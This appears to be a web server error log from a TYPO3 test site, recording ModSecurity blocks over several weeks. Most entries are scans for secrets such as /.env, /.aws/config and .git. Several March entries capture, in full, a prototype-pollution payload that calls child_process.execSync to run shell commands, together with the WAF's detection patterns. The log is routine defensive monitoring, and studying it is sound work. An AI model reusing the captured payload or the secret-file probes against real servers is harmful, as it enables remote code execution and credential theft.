[Wed Feb 18 18:18:09.943800 2026] [authz_core:error] [pid 2167596] [client 195.178.110.34:43006] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.travis.yml
[Wed Feb 18 18:18:10.095693 2026] [authz_core:error] [pid 2161842] [client 195.178.110.34:43012] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws.yml
[Wed Feb 18 18:18:10.255925 2026] [authz_core:error] [pid 2161842] [client 195.178.110.34:43012] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/main.yml
[Wed Feb 18 18:18:10.587453 2026] [:error] [pid 2161842] [client 195.178.110.34:43012] [client 195.178.110.34] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aZX0Uh7i3MGSJhlZ2JDhFwAAAAY"]
[Wed Feb 18 18:18:10.587686 2026] [:error] [pid 2161842] [client 195.178.110.34:43012] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aZX0Uh7i3MGSJhlZ2JDhFwAAAAY"]
[Wed Feb 18 18:18:10.587884 2026] [:error] [pid 2161842] [client 195.178.110.34:43012] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aZX0Uh7i3MGSJhlZ2JDhFwAAAAY"]
[Thu Feb 19 00:52:34.562964 2026] [authz_core:error] [pid 2180342] [client 216.81.248.168:57358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Feb 20 21:53:59.091823 2026] [:error] [pid 2217278] [client 216.73.216.144:4295] [client 216.73.216.144] ModSecurity: Warning. Pattern match "^$" at REQUEST_HEADERS:user-agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "628"] [id "920330"] [msg "Empty User Agent Header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EMPTY_HEADER_UA"] [hostname "surf.test.indacotrentino.com"] [uri "/robots.txt"] [unique_id "aZjJ5_k9TgrmoF1WW9rwAwAAAAk"]
[Sat Feb 21 03:19:57.838957 2026] [:error] [pid 2224873] [client 195.250.31.127:55617] [client 195.250.31.127] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZkWTbrhyEsRtf_HRb7AYwAAAAE"]
[Sat Feb 21 03:19:57.839133 2026] [:error] [pid 2224873] [client 195.250.31.127:55617] [client 195.250.31.127] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZkWTbrhyEsRtf_HRb7AYwAAAAE"]
[Sat Feb 21 03:19:57.839300 2026] [:error] [pid 2224873] [client 195.250.31.127:55617] [client 195.250.31.127] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZkWTbrhyEsRtf_HRb7AYwAAAAE"]
[Sun Feb 22 02:21:57.277681 2026] [:error] [pid 2245448] [client 185.93.89.136:52920] [client 185.93.89.136] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZpaNdCAYEuJFmYxTSqhewAAAAQ"]
[Sun Feb 22 02:21:57.277962 2026] [:error] [pid 2245448] [client 185.93.89.136:52920] [client 185.93.89.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZpaNdCAYEuJFmYxTSqhewAAAAQ"]
[Sun Feb 22 02:21:57.278123 2026] [:error] [pid 2245448] [client 185.93.89.136:52920] [client 185.93.89.136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZpaNdCAYEuJFmYxTSqhewAAAAQ"]
[Mon Feb 23 12:05:37.029390 2026] [:error] [pid 2269588] [client 204.76.203.25:38676] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZw0gfndirJT_-J7c7oN4wAAAAM"]
[Mon Feb 23 12:05:37.030883 2026] [:error] [pid 2269588] [client 204.76.203.25:38676] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZw0gfndirJT_-J7c7oN4wAAAAM"]
[Mon Feb 23 12:05:37.031081 2026] [:error] [pid 2269588] [client 204.76.203.25:38676] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZw0gfndirJT_-J7c7oN4wAAAAM"]
[Tue Feb 24 02:41:13.815807 2026] [authz_core:error] [pid 2287904] [client 195.178.110.187:39658] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Feb 24 09:45:32.878660 2026] [:error] [pid 2289848] [client 195.178.110.187:50872] [client 195.178.110.187] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZ1lLNppTl6RnzsBiZSlLgAAAAA"]
[Tue Feb 24 09:45:32.878950 2026] [:error] [pid 2289848] [client 195.178.110.187:50872] [client 195.178.110.187] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZ1lLNppTl6RnzsBiZSlLgAAAAA"]
[Tue Feb 24 09:45:32.879192 2026] [:error] [pid 2289848] [client 195.178.110.187:50872] [client 195.178.110.187] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZ1lLNppTl6RnzsBiZSlLgAAAAA"]
[Sat Feb 28 22:06:01.980834 2026] [:error] [pid 2390578] [client 216.73.216.81:33776] [client 216.73.216.81] ModSecurity: Warning. Pattern match "^$" at REQUEST_HEADERS:user-agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "628"] [id "920330"] [msg "Empty User Agent Header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EMPTY_HEADER_UA"] [hostname "surf.test.indacotrentino.com"] [uri "/robots.txt"] [unique_id "aaNYuUl835-nTrFa7aRA3gAAAAo"]
[Sat Feb 28 23:51:14.686199 2026] [authz_core:error] [pid 2393011] [client 194.180.48.253:3366] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Mar 01 05:33:14.854637 2026] [:error] [pid 2400021] [client 204.76.203.25:55006] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aaPBiqby3IsYOctOxCmOeQAAAAA"]
[Sun Mar 01 05:33:14.854977 2026] [:error] [pid 2400021] [client 204.76.203.25:55006] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aaPBiqby3IsYOctOxCmOeQAAAAA"]
[Sun Mar 01 05:33:14.855163 2026] [:error] [pid 2400021] [client 204.76.203.25:55006] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aaPBiqby3IsYOctOxCmOeQAAAAA"]
[Thu Mar 05 00:54:17.940989 2026] [:error] [pid 2483713] [client 81.200.8.55:63546] [client 81.200.8.55] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aajGKUqs-jHvcy_XENa9iAAAAAE"]
[Thu Mar 05 00:54:17.942683 2026] [:error] [pid 2483713] [client 81.200.8.55:63546] [client 81.200.8.55] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aajGKUqs-jHvcy_XENa9iAAAAAE"]
[Thu Mar 05 00:54:17.942851 2026] [:error] [pid 2483713] [client 81.200.8.55:63546] [client 81.200.8.55] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aajGKUqs-jHvcy_XENa9iAAAAAE"]
[Fri Mar 06 01:04:37.540749 2026] [authz_core:error] [pid 2506124] [client 34.90.255.59:36980] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 06 21:26:59.041007 2026] [:error] [pid 2511916] [client 204.76.203.25:48088] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aas4kxRvyW9u2KRWX0106wAAAAg"]
[Fri Mar 06 21:26:59.041213 2026] [:error] [pid 2511916] [client 204.76.203.25:48088] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aas4kxRvyW9u2KRWX0106wAAAAg"]
[Fri Mar 06 21:26:59.041337 2026] [:error] [pid 2511916] [client 204.76.203.25:48088] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aas4kxRvyW9u2KRWX0106wAAAAg"]
[Sat Mar 07 06:29:26.102522 2026] [:error] [pid 2530091] [client 3.10.217.69:39766] [client 3.10.217.69] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aau3ttZFFGZdOAUrvUKDDAAAAAE"]
[Sat Mar 07 06:29:26.103941 2026] [:error] [pid 2530091] [client 3.10.217.69:39766] [client 3.10.217.69] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\x22: ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aau3ttZFFGZdOAUrvUKDDAAAAAE"]
[Sat Mar 07 06:29:26.104838 2026] [:error] [pid 2530091] [client 3.10.217.69:39766] [client 3.10.217.69] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aau3ttZFFGZdOAUrvUKDDAAAAAE"]
[Sat Mar 07 06:29:26.104981 2026] [:error] [pid 2530091] [client 3.10.217.69:39766] [client 3.10.217.69] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aau3ttZFFGZdOAUrvUKDDAAAAAE"]
[Sat Mar 07 06:29:26.135957 2026] [:error] [pid 2530091] [client 3.10.217.69:39766] [client 3.10.217.69] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aau3ttZFFGZdOAUrvUKDDQAAAAE"]
[Sat Mar 07 06:29:26.136450 2026] [:error] [pid 2530091] [client 3.10.217.69:39766] [client 3.10.217.69] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\x22: ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aau3ttZFFGZdOAUrvUKDDQAAAAE"]
[Sat Mar 07 06:29:26.137459 2026] [:error] [pid 2530091] [client 3.10.217.69:39766] [client 3.10.217.69] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aau3ttZFFGZdOAUrvUKDDQAAAAE"]
[Sat Mar 07 06:29:26.137594 2026] [:error] [pid 2530091] [client 3.10.217.69:39766] [client 3.10.217.69] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aau3ttZFFGZdOAUrvUKDDQAAAAE"]
[Sat Mar 07 23:00:38.704235 2026] [:error] [pid 2530090] [client 54.153.10.186:39676] [client 54.153.10.186] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aaygBqZMpHjtpPWB_zsfogAAAAA"]
